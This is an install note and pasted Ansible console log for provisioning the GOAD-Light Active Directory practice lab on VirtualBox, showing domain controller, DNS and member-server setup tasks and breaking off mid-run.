GOAD install
Ubuntu20 + Virtualbox 7.1
.
refence used : https://github.com/Orange-Cyberdefense/GOAD/issues/281
.
the commands to provision
bolke@hacky:~/GOAD$ ./goad.sh
_____ _____ _____
/ ____| / ||| \ /\ | __ \
| | __|| ||| | / \ | | | |
| | |_ || ||| |/ /\ \ | | | |
| |__| || ||| / /__\ \| |__| |
\_____| \_|||_/________\_____/
Game Of Active Directory
Pwning is coming
Goad management console type help or ? to list commands
[*] Start Loading default instance
[+] Instance 850bec-goad-light-virtualbox loaded
[*] lab instances :
┏━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━┳━━━━━━━━━━━━┳━━━━━━━━━━━━┳━━━━━━━━━━━━━━━━━┳━━━━━━━━━━━━━━━━━━━━━━━━┳━━━━━━━━━━━━┳━━━━━━━━━━━━┓
┃ Instance ID ┃ Lab ┃ Provider ┃ IP Range ┃ Status ┃ Is Default ┃ Extensions ┃
┡━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━╇━━━━━━━━━━━━╇━━━━━━━━━━━━╇━━━━━━━━━━━━━━━━━╇━━━━━━━━━━━━━━━━━━━━━━━━╇━━━━━━━━━━━━╇━━━━━━━━━━━━┩
│ > 850bec-goad-light-virtualbox │ GOAD-Light │ virtualbox │ 192.168.56.0/24 │ ready for provisioning │ Yes │ │
└────────────────────────────────┴────────────┴────────────┴─────────────────┴────────────────────────┴────────────┴────────────┘
GOAD-Light/virtualbox/local/192.168.56.X (850bec-goad-light-virtualbox) > provision
provision provision_extension provision_lab provision_lab_from
GOAD-Light/virtualbox/local/192.168.56.X (850bec-goad-light-virtualbox) > provision_lab
[*] Loading inventory
[+] Lab inventory : /home/bolke/GOAD/ad/GOAD-Light/data/inventory file found
[+] Provider inventory : /home/bolke/GOAD/workspace/850bec-goad-light-virtualbox/inventory file found
[+] Global inventory : /home/bolke/GOAD/globalsettings.ini file found
[*] Loading playbook list
[+] build.yml file found
[+] ad-servers.yml file found
[+] ad-parent_domain.yml file found
[+] ad-child_domain.yml file found
[+] wait5m.yml file found
[+] ad-members.yml file found
[+] ad-trusts.yml file found
[+] ad-data.yml file found
[+] ad-gmsa.yml file found
[+] laps.yml file found
[+] ad-relations.yml file found
[+] adcs.yml file found
[+] ad-acl.yml file found
[+] servers.yml file found
[+] security.yml file found
[+] vulnerabilities.yml file found
[*] Run playbook : build.yml with inventory file(s) : /home/bolke/GOAD/ad/GOAD-Light/data/inventory, /home/bolke/GOAD/workspace/850bec-goad-light-virtualbox/inventory, /home/bolke/GOAD/globalsettings.ini
[*] CWD: /ansible/
[*] Running command : ansible-playbook -i /home/bolke/GOAD/ad/GOAD-Light/data/inventory -i /home/bolke/GOAD/workspace/850bec-goad-light-virtualbox/inventory -i /home/bolke/GOAD/globalsettings.ini
build.yml
[WARNING]: Could not match supplied host pattern, ignoring: extensions
PLAY [Read data files] *************************************************************************************************************************************************************************************
[started TASK: Gathering Facts on dc01]
[started TASK: Gathering Facts on dc02]
[started TASK: Gathering Facts on srv02]
TASK [Gathering Facts] *************************************************************************************************************************************************************************************
ok: [dc01]
ok: [dc02]
ok: [srv02]
[started TASK: save the Json data to a Variable as a Fact on dc01]
.
complete
bolke@hacky:~/GOAD$ ./goad.sh
_____ _____ _____
/ ____| / ||| \ /\ | __ \
| | __|| ||| | / \ | | | |
| | |_ || ||| |/ /\ \ | | | |
| |__| || ||| / /__\ \| |__| |
\_____| \_|||_/________\_____/
Game Of Active Directory
Pwning is coming
Goad management console type help or ? to list commands
[*] Start Loading default instance
[+] Instance 850bec-goad-light-virtualbox loaded
[*] lab instances :
┏━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━┳━━━━━━━━━━━━┳━━━━━━━━━━━━┳━━━━━━━━━━━━━━━━━┳━━━━━━━━━━━━━━━━━━━━━━━━┳━━━━━━━━━━━━┳━━━━━━━━━━━━┓
┃ Instance ID ┃ Lab ┃ Provider ┃ IP Range ┃ Status ┃ Is Default ┃ Extensions ┃
┡━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━╇━━━━━━━━━━━━╇━━━━━━━━━━━━╇━━━━━━━━━━━━━━━━━╇━━━━━━━━━━━━━━━━━━━━━━━━╇━━━━━━━━━━━━╇━━━━━━━━━━━━┩
│ > 850bec-goad-light-virtualbox │ GOAD-Light │ virtualbox │ 192.168.56.0/24 │ ready for provisioning │ Yes │ │
└────────────────────────────────┴────────────┴────────────┴─────────────────┴────────────────────────┴────────────┴────────────┘
GOAD-Light/virtualbox/local/192.168.56.X (850bec-goad-light-virtualbox) > provision
provision provision_extension provision_lab provision_lab_from
GOAD-Light/virtualbox/local/192.168.56.X (850bec-goad-light-virtualbox) > provision_lab
[*] Loading inventory
[+] Lab inventory : /home/bolke/GOAD/ad/GOAD-Light/data/inventory file found
[+] Provider inventory : /home/bolke/GOAD/workspace/850bec-goad-light-virtualbox/inventory file found
[+] Global inventory : /home/bolke/GOAD/globalsettings.ini file found
[*] Loading playbook list
[+] build.yml file found
[+] ad-servers.yml file found
[+] ad-parent_domain.yml file found
[+] ad-child_domain.yml file found
[+] wait5m.yml file found
[+] ad-members.yml file found
[+] ad-trusts.yml file found
[+] ad-data.yml file found
[+] ad-gmsa.yml file found
[+] laps.yml file found
[+] ad-relations.yml file found
[+] adcs.yml file found
[+] ad-acl.yml file found
[+] servers.yml file found
[+] security.yml file found
[+] vulnerabilities.yml file found
[*] Run playbook : build.yml with inventory file(s) : /home/bolke/GOAD/ad/GOAD-Light/data/inventory, /home/bolke/GOAD/workspace/850bec-goad-light-virtualbox/inventory, /home/bolke/GOAD/globalsettings.ini
[*] CWD: /ansible/
[*] Running command : ansible-playbook -i /home/bolke/GOAD/ad/GOAD-Light/data/inventory -i /home/bolke/GOAD/workspace/850bec-goad-light-virtualbox/inventory -i /home/bolke/GOAD/globalsettings.ini
build.yml
[WARNING]: Could not match supplied host pattern, ignoring: extensions
PLAY [Read data files] *************************************************************************************************************************************************************************************
[started TASK: Gathering Facts on dc01]
[started TASK: Gathering Facts on dc02]
[started TASK: Gathering Facts on srv02]
TASK [Gathering Facts] *************************************************************************************************************************************************************************************
ok: [dc01]
ok: [dc02]
ok: [srv02]
[started TASK: save the Json data to a Variable as a Fact on dc01]
TASK [save the Json data to a Variable as a Fact] **********************************************************************************************************************************************************
ok: [dc01]
[started TASK: find domain_adapter on dc01]
TASK [find domain_adapter] *********************************************************************************************************************************************************************************
ok: [dc01] => (item={'dns_domain': None, 'connection_name': 'Ethernet 2', 'default_gateway': None, 'mtu': 1500, 'interface_name': 'Intel(R) PRO/1000 MT Desktop Adapter #2', 'ipv6': {'address': 'fe80::e990:f5d4:39ba:4f6b%7', 'prefix': '64'}, 'macaddress': '08:00:27:F7:EA:5F', 'speed': 1000, 'interface_index': 7, 'ipv4': {'address': '192.168.56.10', 'prefix': '24'}})
[started TASK: find nat_adapter on dc01]
TASK [find nat_adapter] ************************************************************************************************************************************************************************************
ok: [dc01] => (item={'dns_domain': 'home', 'connection_name': 'Ethernet', 'default_gateway': 'fe80::2%6', 'mtu': 1500, 'interface_name': 'Intel(R) PRO/1000 MT Desktop Adapter', 'ipv6': [{'address': 'fd17:625c:f037:2:a847:4c4e:e612:2c3c', 'prefix': '64'}, {'address': 'fe80::a847:4c4e:e612:2c3c%6', 'prefix': '64'}], 'macaddress': '08:00:27:7A:A2:FC', 'speed': 1000, 'interface_index': 6, 'ipv4': {'address': '10.0.2.15', 'prefix': '24'}})
[started TASK: find number of interfaces on dc01]
TASK [find number of interfaces] ***************************************************************************************************************************************************************************
ok: [dc01]
[started TASK: find if two adapters on dc01]
TASK [find if two adapters] ********************************************************************************************************************************************************************************
ok: [dc01]
[started TASK: confirm nat_adapter on dc01]
PLAY [build all] *******************************************************************************************************************************************************************************************
[started TASK: Gathering Facts on dc01]
[started TASK: Gathering Facts on dc02]
[started TASK: Gathering Facts on srv02]
TASK [Gathering Facts] *************************************************************************************************************************************************************************************
ok: [srv02]
ok: [dc02]
ok: [dc01]
[started TASK: common : Force a DNS on the adapter {{nat_adapter}} on dc01]
[started TASK: common : Force a DNS on the adapter {{nat_adapter}} on dc02]
[started TASK: common : Force a DNS on the adapter {{nat_adapter}} on srv02]
[started TASK: common : Set a proxy for specific protocols on dc01]
[started TASK: common : Set a proxy for specific protocols on dc02]
[started TASK: common : Set a proxy for specific protocols on srv02]
[started TASK: common : Configure IE to use a specific proxy per protocol on dc01]
[started TASK: common : Configure IE to use a specific proxy per protocol on dc02]
[started TASK: common : Configure IE to use a specific proxy per protocol on srv02]
[started TASK: common : Upgrade module PowerShellGet to fix accept license issue on last windows ansible version on dc01]
[started TASK: common : Upgrade module PowerShellGet to fix accept license issue on last windows ansible version on dc02]
[started TASK: common : Upgrade module PowerShellGet to fix accept license issue on last windows ansible version on srv02]
TASK [common : Upgrade module PowerShellGet to fix accept license issue on last windows ansible version] ***************************************************************************************************
changed: [dc01]
changed: [srv02]
changed: [dc02]
[started TASK: common : Windows | Check for ComputerManagementDsc Powershell module on dc01]
[started TASK: common : Windows | Check for ComputerManagementDsc Powershell module on dc02]
[started TASK: common : Windows | Check for ComputerManagementDsc Powershell module on srv02]
TASK [common : Windows | Check for ComputerManagementDsc Powershell module] ********************************************************************************************************************************
ok: [dc01]
ok: [srv02]
ok: [dc02]
[started TASK: common : Windows | Enable Remote Desktop on dc01]
[started TASK: common : Windows | Enable Remote Desktop on dc02]
[started TASK: common : Windows | Enable Remote Desktop on srv02]
TASK [common : Windows | Enable Remote Desktop] ************************************************************************************************************************************************************
ok: [dc01]
ok: [srv02]
ok: [dc02]
[started TASK: common : Windows | Check for xNetworking Powershell module on dc01]
[started TASK: common : Windows | Check for xNetworking Powershell module on dc02]
[started TASK: common : Windows | Check for xNetworking Powershell module on srv02]
TASK [common : Windows | Check for xNetworking Powershell module] ******************************************************************************************************************************************
ok: [srv02]
ok: [dc02]
ok: [dc01]
[started TASK: common : Firewall | Allow RDP through Firewall on dc01]
[started TASK: common : Firewall | Allow RDP through Firewall on dc02]
[started TASK: common : Firewall | Allow RDP through Firewall on srv02]
TASK [common : Firewall | Allow RDP through Firewall] ******************************************************************************************************************************************************
ok: [dc01]
ok: [srv02]
ok: [dc02]
[started TASK: common : Add a network static route on dc01]
[started TASK: common : Add a network static route on dc02]
[started TASK: common : Add a network static route on srv02]
[started TASK: settings/keyboard : Add Keyboard Layouts registry key on dc01]
[started TASK: settings/keyboard : Add Keyboard Layouts registry key on dc02]
[started TASK: settings/keyboard : Add Keyboard Layouts registry key on srv02]
TASK [settings/keyboard : Add Keyboard Layouts registry key] ***********************************************************************************************************************************************
ok: [dc01] => (item=0000040C)
ok: [dc02] => (item=0000040C)
ok: [srv02] => (item=0000040C)
ok: [dc01] => (item=00000409)
ok: [srv02] => (item=00000409)
ok: [dc02] => (item=00000409)
[started TASK: settings/keyboard : Add Keyboard Layouts registry key for default users on dc01]
[started TASK: settings/keyboard : Add Keyboard Layouts registry key for default users on dc02]
[started TASK: settings/keyboard : Add Keyboard Layouts registry key for default users on srv02]
TASK [settings/keyboard : Add Keyboard Layouts registry key for default users] *****************************************************************************************************************************
ok: [srv02] => (item=0000040C)
ok: [dc02] => (item=0000040C)
ok: [dc01] => (item=0000040C)
ok: [srv02] => (item=00000409)
ok: [dc02] => (item=00000409)
ok: [dc01] => (item=00000409)
PLAY [build all no update] *********************************************************************************************************************************************************************************
[started TASK: Gathering Facts on dc01]
[started TASK: Gathering Facts on dc02]
TASK [Gathering Facts] *************************************************************************************************************************************************************************************
ok: [dc01]
ok: [dc02]
[started TASK: settings/no_updates : Disable windows update on dc01]
[started TASK: settings/no_updates : Disable windows update on dc02]
TASK [settings/no_updates : Disable windows update] ********************************************************************************************************************************************************
changed: [dc01]
changed: [dc02]
PLAY [Launch windows updates before continue] **************************************************************************************************************************************************************
[started TASK: Gathering Facts on srv02]
TASK [Gathering Facts] *************************************************************************************************************************************************************************************
ok: [srv02]
PLAY RECAP *************************************************************************************************************************************************************************************************
dc01 : ok=16 changed=2 unreachable=0 failed=0 skipped=5 rescued=0 ignored=0
dc02 : ok=11 changed=2 unreachable=0 failed=0 skipped=4 rescued=0 ignored=0
srv02 : ok=10 changed=1 unreachable=0 failed=0 skipped=4 rescued=0 ignored=0
[*] Run playbook : ad-servers.yml with inventory file(s) : /home/bolke/GOAD/ad/GOAD-Light/data/inventory, /home/bolke/GOAD/workspace/850bec-goad-light-virtualbox/inventory,
/home/bolke/GOAD/globalsettings.ini
[*] CWD: /ansible/
[*] Running command : ansible-playbook -i /home/bolke/GOAD/ad/GOAD-Light/data/inventory -i /home/bolke/GOAD/workspace/850bec-goad-light-virtualbox/inventory -i /home/bolke/GOAD/globalsettings.ini
ad-servers.yml
[WARNING]: Could not match supplied host pattern, ignoring: extensions
PLAY [Read data files] *************************************************************************************************************************************************************************************
[started TASK: Gathering Facts on dc01]
[started TASK: Gathering Facts on dc02]
[started TASK: Gathering Facts on srv02]
TASK [Gathering Facts] *************************************************************************************************************************************************************************************
ok: [srv02]
ok: [dc02]
ok: [dc01]
[started TASK: save the Json data to a Variable as a Fact on dc01]
TASK [save the Json data to a Variable as a Fact] **********************************************************************************************************************************************************
ok: [dc01]
[started TASK: find domain_adapter on dc01]
TASK [find domain_adapter] *********************************************************************************************************************************************************************************
ok: [dc01] => (item={'dns_domain': None, 'connection_name': 'Ethernet 2', 'default_gateway': None, 'mtu': 1500, 'interface_name': 'Intel(R) PRO/1000 MT Desktop Adapter #2', 'ipv6': {'address': 'fe80::e990:f5d4:39ba:4f6b%7', 'prefix': '64'}, 'macaddress': '08:00:27:F7:EA:5F', 'speed': 1000, 'interface_index': 7, 'ipv4': {'address': '192.168.56.10', 'prefix': '24'}})
[started TASK: find nat_adapter on dc01]
TASK [find nat_adapter] ************************************************************************************************************************************************************************************
ok: [dc01] => (item={'dns_domain': 'home', 'connection_name': 'Ethernet', 'default_gateway': 'fe80::2%6', 'mtu': 1500, 'interface_name': 'Intel(R) PRO/1000 MT Desktop Adapter', 'ipv6': [{'address': 'fd17:625c:f037:2:a847:4c4e:e612:2c3c', 'prefix': '64'}, {'address': 'fe80::a847:4c4e:e612:2c3c%6', 'prefix': '64'}], 'macaddress': '08:00:27:7A:A2:FC', 'speed': 1000, 'interface_index': 6, 'ipv4': {'address': '10.0.2.15', 'prefix': '24'}})
[started TASK: find number of interfaces on dc01]
TASK [find number of interfaces] ***************************************************************************************************************************************************************************
ok: [dc01]
[started TASK: find if two adapters on dc01]
TASK [find if two adapters] ********************************************************************************************************************************************************************************
ok: [dc01]
[started TASK: confirm nat_adapter on dc01]
PLAY [Prepare servers set admin password, set hostname] ****************************************************************************************************************************************************
[started TASK: Gathering Facts on dc01]
[started TASK: Gathering Facts on dc02]
[started TASK: Gathering Facts on srv02]
TASK [Gathering Facts] *************************************************************************************************************************************************************************************
ok: [srv02]
ok: [dc02]
ok: [dc01]
[started TASK: settings/admin_password : Ensure that Admin is present with a valid password on dc01]
[started TASK: settings/admin_password : Ensure that Admin is present with a valid password on dc02]
[started TASK: settings/admin_password : Ensure that Admin is present with a valid password on srv02]
TASK [settings/admin_password : Ensure that Admin is present with a valid password] ************************************************************************************************************************
ok: [dc01]
ok: [srv02]
ok: [dc02]
[started TASK: settings/hostname : Change the hostname on dc01]
[started TASK: settings/hostname : Change the hostname on dc02]
[started TASK: settings/hostname : Change the hostname on srv02]
TASK [settings/hostname : Change the hostname] *************************************************************************************************************************************************************
ok: [dc01]
ok: [dc02]
ok: [srv02]
[started TASK: settings/hostname : Reboot if needed on dc01]
[started TASK: settings/hostname : Reboot if needed on dc02]
[started TASK: settings/hostname : Reboot if needed on srv02]
PLAY RECAP *************************************************************************************************************************************************************************************************
dc01 : ok=9 changed=0 unreachable=0 failed=0 skipped=2 rescued=0 ignored=0
dc02 : ok=4 changed=0 unreachable=0 failed=0 skipped=1 rescued=0 ignored=0
srv02 : ok=4 changed=0 unreachable=0 failed=0 skipped=1 rescued=0 ignored=0
[*] Run playbook : ad-parent_domain.yml with inventory file(s) : /home/bolke/GOAD/ad/GOAD-Light/data/inventory, /home/bolke/GOAD/workspace/850bec-goad-light-virtualbox/inventory,
/home/bolke/GOAD/globalsettings.ini
[*] CWD: /ansible/
[*] Running command : ansible-playbook -i /home/bolke/GOAD/ad/GOAD-Light/data/inventory -i /home/bolke/GOAD/workspace/850bec-goad-light-virtualbox/inventory -i /home/bolke/GOAD/globalsettings.ini
ad-parent_domain.yml
[WARNING]: Could not match supplied host pattern, ignoring: extensions
PLAY [Read data files] *************************************************************************************************************************************************************************************
[started TASK: Gathering Facts on dc01]
[started TASK: Gathering Facts on dc02]
[started TASK: Gathering Facts on srv02]
TASK [Gathering Facts] *************************************************************************************************************************************************************************************
ok: [srv02]
ok: [dc01]
ok: [dc02]
[started TASK: save the Json data to a Variable as a Fact on dc01]
TASK [save the Json data to a Variable as a Fact] **********************************************************************************************************************************************************
ok: [dc01]
[started TASK: find domain_adapter on dc01]
TASK [find domain_adapter] *********************************************************************************************************************************************************************************
ok: [dc01] => (item={'dns_domain': None, 'connection_name': 'Ethernet 2', 'default_gateway': None, 'mtu': 1500, 'interface_name': 'Intel(R) PRO/1000 MT Desktop Adapter #2', 'ipv6': {'address': 'fe80::e990:f5d4:39ba:4f6b%7', 'prefix': '64'}, 'macaddress': '08:00:27:F7:EA:5F', 'speed': 1000, 'interface_index': 7, 'ipv4': {'address': '192.168.56.10', 'prefix': '24'}})
[started TASK: find nat_adapter on dc01]
TASK [find nat_adapter] ************************************************************************************************************************************************************************************
ok: [dc01] => (item={'dns_domain': 'home', 'connection_name': 'Ethernet', 'default_gateway': 'fe80::2%6', 'mtu': 1500, 'interface_name': 'Intel(R) PRO/1000 MT Desktop Adapter', 'ipv6': [{'address': 'fd17:625c:f037:2:a847:4c4e:e612:2c3c', 'prefix': '64'}, {'address': 'fe80::a847:4c4e:e612:2c3c%6', 'prefix': '64'}], 'macaddress': '08:00:27:7A:A2:FC', 'speed': 1000, 'interface_index': 6, 'ipv4': {'address': '10.0.2.15', 'prefix': '24'}})
[started TASK: find number of interfaces on dc01]
TASK [find number of interfaces] ***************************************************************************************************************************************************************************
ok: [dc01]
[started TASK: find if two adapters on dc01]
TASK [find if two adapters] ********************************************************************************************************************************************************************************
ok: [dc01]
[started TASK: confirm nat_adapter on dc01]
PLAY [Main DC AD configuration] ****************************************************************************************************************************************************************************
[started TASK: Gathering Facts on dc01]
TASK [Gathering Facts] *************************************************************************************************************************************************************************************
ok: [dc01]
[started TASK: domain_controller : disable the registration of the {{nat_adapter}} interface (NAT address) in DNS on dc01]
TASK [domain_controller : disable the registration of the Ethernet interface (NAT address) in DNS] *********************************************************************************************************
changed: [dc01]
[started TASK: domain_controller : Ensure that domain exists on dc01]
TASK [domain_controller : Ensure that domain exists] *******************************************************************************************************************************************************
ok: [dc01]
[started TASK: domain_controller : Reboot to complete domain creation on dc01]
[started TASK: domain_controller : Ensure the server is a domain controller on dc01]
TASK [domain_controller : Ensure the server is a domain controller] ****************************************************************************************************************************************
ok: [dc01]
[started TASK: domain_controller : Reboot to complete domain controller setup on dc01]
[started TASK: domain_controller : Be sure DNS feature is installed on dc01]
TASK [domain_controller : Be sure DNS feature is installed] ************************************************************************************************************************************************
ok: [dc01]
[started TASK: domain_controller : Check for xDnsServer Powershell module on dc01]
TASK [domain_controller : Check for xDnsServer Powershell module] ******************************************************************************************************************************************
ok: [dc01]
[started TASK: domain_controller : enable only the {{domain_adapter}} interface (local) for DNS client requests on dc01]
TASK [domain_controller : enable only the Ethernet 2 interface (local) for DNS client requests] ************************************************************************************************************
changed: [dc01]
[started TASK: domain_controller : Configure DNS Forwarders on dc01]
TASK [domain_controller : Configure DNS Forwarders] ********************************************************************************************************************************************************
ok: [dc01]
[started TASK: domain_controller : Install XactiveDirectory on dc01]
TASK [domain_controller : Install XactiveDirectory] ********************************************************************************************************************************************************
ok: [dc01]
[started TASK: domain_controller : Ensure Administrator is part of Enterprise Admins on dc01]
TASK [domain_controller : Ensure Administrator is part of Enterprise Admins] *******************************************************************************************************************************
ok: [dc01]
[started TASK: domain_controller : Ensure Administrator is part of Domain Admins on dc01]
TASK [domain_controller : Ensure Administrator is part of Domain Admins] ***********************************************************************************************************************************
ok: [dc01]
PLAY RECAP *************************************************************************************************************************************************************************************************
dc01 : ok=17 changed=2 unreachable=0 failed=0 skipped=3 rescued=0 ignored=0
dc02 : ok=1 changed=0 unreachable=0 failed=0 skipped=0 rescued=0 ignored=0
srv02 : ok=1 changed=0 unreachable=0 failed=0 skipped=0 rescued=0 ignored=0
[*] Run playbook : ad-child_domain.yml with inventory file(s) : /home/bolke/GOAD/ad/GOAD-Light/data/inventory, /home/bolke/GOAD/workspace/850bec-goad-light-virtualbox/inventory,
/home/bolke/GOAD/globalsettings.ini
[*] CWD: /ansible/
[*] Running command : ansible-playbook -i /home/bolke/GOAD/ad/GOAD-Light/data/inventory -i /home/bolke/GOAD/workspace/850bec-goad-light-virtualbox/inventory -i /home/bolke/GOAD/globalsettings.ini
ad-child_domain.yml
[WARNING]: Could not match supplied host pattern, ignoring: extensions
PLAY [Read data files] *************************************************************************************************************************************************************************************
[started TASK: Gathering Facts on dc01]
[started TASK: Gathering Facts on dc02]
[started TASK: Gathering Facts on srv02]
TASK [Gathering Facts] *************************************************************************************************************************************************************************************
ok: [srv02]
ok: [dc02]
ok: [dc01]
[started TASK: save the Json data to a Variable as a Fact on dc01]
TASK [save the Json data to a Variable as a Fact] **********************************************************************************************************************************************************
ok: [dc01]
[started TASK: find domain_adapter on dc01]
TASK [find domain_adapter] *********************************************************************************************************************************************************************************
ok: [dc01] => (item={'dns_domain': None, 'connection_name': 'Ethernet 2', 'default_gateway': None, 'mtu': 1500, 'interface_name': 'Intel(R) PRO/1000 MT Desktop Adapter #2', 'ipv6': {'address': 'fe80::e990:f5d4:39ba:4f6b%7', 'prefix': '64'}, 'macaddress': '08:00:27:F7:EA:5F', 'speed': 1000, 'interface_index': 7, 'ipv4': {'address': '192.168.56.10', 'prefix': '24'}})
[started TASK: find nat_adapter on dc01]
TASK [find nat_adapter] ************************************************************************************************************************************************************************************
ok: [dc01] => (item={'dns_domain': 'home', 'connection_name': 'Ethernet', 'default_gateway': 'fe80::2%6', 'mtu': 1500, 'interface_name': 'Intel(R) PRO/1000 MT Desktop Adapter', 'ipv6': [{'address': 'fd17:625c:f037:2:a847:4c4e:e612:2c3c', 'prefix': '64'}, {'address': 'fe80::a847:4c4e:e612:2c3c%6', 'prefix': '64'}], 'macaddress': '08:00:27:7A:A2:FC', 'speed': 1000, 'interface_index': 6, 'ipv4': {'address': '10.0.2.15', 'prefix': '24'}})
[started TASK: find number of interfaces on dc01]
TASK [find number of interfaces] ***************************************************************************************************************************************************************************
ok: [dc01]
[started TASK: find if two adapters on dc01]
TASK [find if two adapters] ********************************************************************************************************************************************************************************
ok: [dc01]
[started TASK: confirm nat_adapter on dc01]
PLAY [Child DC AD configuration] ***************************************************************************************************************************************************************************
[started TASK: Gathering Facts on dc02]
TASK [Gathering Facts] *************************************************************************************************************************************************************************************
ok: [dc02]
[started TASK: child_domain : disable the registration of the {{nat_adapter}} interface (NAT address) in DNS on dc02]
TASK [child_domain : disable the registration of the Ethernet interface (NAT address) in DNS] **************************************************************************************************************
changed: [dc02]
[started TASK: child_domain : Set configure dns to {{dns_domain}} on dc02]
TASK [child_domain : Set configure dns to dc01] ************************************************************************************************************************************************************
changed: [dc02]
[started TASK: child_domain : Install windows features - AD Domain Services on dc02]
TASK [child_domain : Install windows features - AD Domain Services] ****************************************************************************************************************************************
ok: [dc02]
[started TASK: child_domain : Install windows features - RSAT-ADDS on dc02]
TASK [child_domain : Install windows features - RSAT-ADDS] *************************************************************************************************************************************************
ok: [dc02]
[started TASK: child_domain : add child domain to parent domain on dc02]
TASK [child_domain : add child domain to parent domain] ****************************************************************************************************************************************************
ok: [dc02]
[started TASK: child_domain : Reboot on dc02]
[started TASK: child_domain : enable the {{domain_adapter}} interface (local) for DNS client requests on dc02]
TASK [child_domain : enable the Ethernet 2 interface (local) for DNS client requests] **********************************************************************************************************************
changed: [dc02]
[started TASK: child_domain : Check for xDnsServer Powershell module on dc02]
TASK [child_domain : Check for xDnsServer Powershell module] ***********************************************************************************************************************************************
changed: [dc02]
[started TASK: child_domain : Configure DNS Forwarders on dc02]
TASK [child_domain : Configure DNS Forwarders] *************************************************************************************************************************************************************
changed: [dc02]
[started TASK: child_domain : Install XactiveDirectory on dc02]
TASK [child_domain : Install XactiveDirectory] *************************************************************************************************************************************************************
changed: [dc02]
[started TASK: child_domain : enable the Active directory web services if not enabled on dc02]
TASK [child_domain : enable the Active directory web services if not enabled] ******************************************************************************************************************************
changed: [dc02]
[started TASK: dns_conditional_forwarder : Add dns server zone on dc02]
TASK [dns_conditional_forwarder : Add dns server zone] *****************************************************************************************************************************************************
changed: [dc02]
PLAY [Parent DC ADD DNS configuration] *********************************************************************************************************************************************************************
[started TASK: Gathering Facts on dc01]
TASK [Gathering Facts] *************************************************************************************************************************************************************************************
ok: [dc01]
[started TASK: parent_child_dns : add dns delegation to child domain on dc01]
TASK [parent_child_dns : add dns delegation to child domain] ***********************************************************************************************************************************************
changed: [dc01] => (item=north.sevenkingdoms.local)
[started TASK: parent_child_dns : create conditional forwarder to child domain on dc01]
TASK [parent_child_dns : create conditional forwarder to child domain] *************************************************************************************************************************************
changed: [dc01] => (item=north.sevenkingdoms.local)
PLAY RECAP *************************************************************************************************************************************************************************************************
dc01 : ok=9 changed=2 unreachable=0 failed=0 skipped=1 rescued=0 ignored=0
dc02 : ok=13 changed=8 unreachable=0 failed=0 skipped=1 rescued=0 ignored=0
srv02 : ok=1 changed=0 unreachable=0 failed=0 skipped=0 rescued=0 ignored=0
[*] Run playbook : wait5m.yml with inventory file(s) : /home/bolke/GOAD/ad/GOAD-Light/data/inventory, /home/bolke/GOAD/workspace/850bec-goad-light-virtualbox/inventory, /home/bolke/GOAD/globalsettings.ini
[*] CWD: /ansible/
[*] Running command : ansible-playbook -i /home/bolke/GOAD/ad/GOAD-Light/data/inventory -i /home/bolke/GOAD/workspace/850bec-goad-light-virtualbox/inventory -i /home/bolke/GOAD/globalsettings.ini
wait5m.yml
PLAY [wait] ************************************************************************************************************************************************************************************************
[started TASK: Gathering Facts on localhost]
TASK [Gathering Facts] *************************************************************************************************************************************************************************************
ok: [localhost]
[started TASK: Wait 5 minutes to finish on localhost]
Pausing for 300 seconds
(ctrl+C then 'C' = continue early, ctrl+C then 'A' = abort)
Press 'C' to continue the play or 'A' to abort
TASK [Wait 5 minutes to finish] ****************************************************************************************************************************************************************************
ok: [localhost]
PLAY RECAP *************************************************************************************************************************************************************************************************
localhost : ok=2 changed=0 unreachable=0 failed=0 skipped=0 rescued=0 ignored=0
[*] Run playbook : ad-members.yml with inventory file(s) : /home/bolke/GOAD/ad/GOAD-Light/data/inventory, /home/bolke/GOAD/workspace/850bec-goad-light-virtualbox/inventory,
/home/bolke/GOAD/globalsettings.ini
[*] CWD: /ansible/
[*] Running command : ansible-playbook -i /home/bolke/GOAD/ad/GOAD-Light/data/inventory -i /home/bolke/GOAD/workspace/850bec-goad-light-virtualbox/inventory -i /home/bolke/GOAD/globalsettings.ini
ad-members.yml
[WARNING]: Could not match supplied host pattern, ignoring: extensions
PLAY [Read data files] *************************************************************************************************************************************************************************************
[started TASK: Gathering Facts on dc01]
[started TASK: Gathering Facts on dc02]
[started TASK: Gathering Facts on srv02]
TASK [Gathering Facts] *************************************************************************************************************************************************************************************
ok: [dc01]
ok: [srv02]
ok: [dc02]
[started TASK: save the Json data to a Variable as a Fact on dc01]
TASK [save the Json data to a Variable as a Fact] **********************************************************************************************************************************************************
ok: [dc01]
[started TASK: find domain_adapter on dc01]
TASK [find domain_adapter] *********************************************************************************************************************************************************************************
ok: [dc01] => (item={'dns_domain': None, 'connection_name': 'Ethernet 2', 'default_gateway': None, 'mtu': 1500, 'interface_name': 'Intel(R) PRO/1000 MT Desktop Adapter #2', 'ipv6': {'address': 'fe80::e990:f5d4:39ba:4f6b%7', 'prefix': '64'}, 'macaddress': '08:00:27:F7:EA:5F', 'speed': 1000, 'interface_index': 7, 'ipv4': {'address': '192.168.56.10', 'prefix': '24'}})
[started TASK: find nat_adapter on dc01]
TASK [find nat_adapter] ************************************************************************************************************************************************************************************
ok: [dc01] => (item={'dns_domain': 'home', 'connection_name': 'Ethernet', 'default_gateway': 'fe80::2%6', 'mtu': 1500, 'interface_name': 'Intel(R) PRO/1000 MT Desktop Adapter', 'ipv6': [{'address': 'fd17:625c:f037:2:a847:4c4e:e612:2c3c', 'prefix': '64'}, {'address': 'fe80::a847:4c4e:e612:2c3c%6', 'prefix': '64'}], 'macaddress': '08:00:27:7A:A2:FC', 'speed': 1000, 'interface_index': 6, 'ipv4': {'address': '10.0.2.15', 'prefix': '24'}})
[started TASK: find number of interfaces on dc01]
TASK [find number of interfaces] ***************************************************************************************************************************************************************************
ok: [dc01]
[started TASK: find if two adapters on dc01]
TASK [find if two adapters] ********************************************************************************************************************************************************************************
ok: [dc01]
[started TASK: confirm nat_adapter on dc01]
PLAY [play servers AD configuration] ***********************************************************************************************************************************************************************
[started TASK: Gathering Facts on srv02]
TASK [Gathering Facts] *************************************************************************************************************************************************************************************
ok: [srv02]
[started TASK: member_server : prioritize the {{domain_adapter}} interface (local) as the default for routing on srv02]
TASK [member_server : prioritize the Ethernet 2 interface (local) as the default for routing] **************************************************************************************************************
changed: [srv02]
[started TASK: member_server : Set configure dns to {{dns_domain}} on srv02]
TASK [member_server : Set configure dns to dc02] ***********************************************************************************************************************************************************
changed: [srv02]
